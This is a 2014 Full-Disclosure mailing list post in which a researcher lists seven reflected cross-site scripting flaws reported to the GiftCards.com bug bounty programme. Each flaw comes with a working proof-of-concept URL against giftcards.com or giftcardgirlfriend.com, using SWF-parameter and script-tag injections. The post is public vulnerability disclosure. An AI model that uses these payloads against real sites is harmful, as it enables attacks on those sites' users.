[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5302FA0E.7060501@t-online.de>
Date: Tue, 18 Feb 2014 07:13:34 +0100
From: Stefan Schurtz <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: My experiences with the GiftCards.com Bug Bounty
Program
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Since November 2013 I reported seven Cross-site Scripting
vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of
them wasn't a duplicate :-/. Strange? Perhaps, but not impossible
given the simplicity of the vulnerabilities.
But what I really don't understand: Why do they still work until today?
######################################
# 11/17/2013 Vulnerability #1: (DUP) #
######################################
// Reflected Cross-site Scripting
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//
// Original advisory
http://insight-labs.org/?p=738
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/player.swf-Sourcecode-Giftcardgirlfriend.com.JPG
#########################################################
# 11/17/2013 Vulnerability #2: - OK - Reward or not ;-) #
#########################################################
// Reflected Cross-site Scripting (tested with FF 25.0.1)
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
// Original Advisory
http://inj3ct0rs.com/exploit/description/19711
Screenshots:
http://darksecurity.de/advisories/BugBounty/giftcards/Wordpress-Version-SourceCode-giftcardgirlfriend.com.JPG
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-swfupload-giftcardgirlfriend.com.JPG
######################################
# 11/21/2013 Vulnerability #3: (DUP) #
######################################
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox
25.0.1)
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);
Screenshots:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-SWFFiles-Giftcards.JPG
http://darksecurity.de/advisories/BugBounty/giftcards/SWFScan-Screenshot.JPG
######################################
# 11/26/2013 Vulnerability #4: (DUP) #
######################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-OrderStatus-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #5: #
################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Signup-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #6: #
################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Member-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #7: #
################################
// Reflected Cross-site Scripting with IE10
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG
Cheers,
sschurtz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlMC+gUACgkQg3svV2LcbMAVOQCePRZ4zb2nhf+6UowoxtTbkb1s
8wIAmQG/BGuP6kNdni4vaae4x0mhPn3P
=SZx4
-----END PGP SIGNATURE-----
Download attachment "0x62DC6CC0.asc" of type "application/pgp-keys" (1800 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists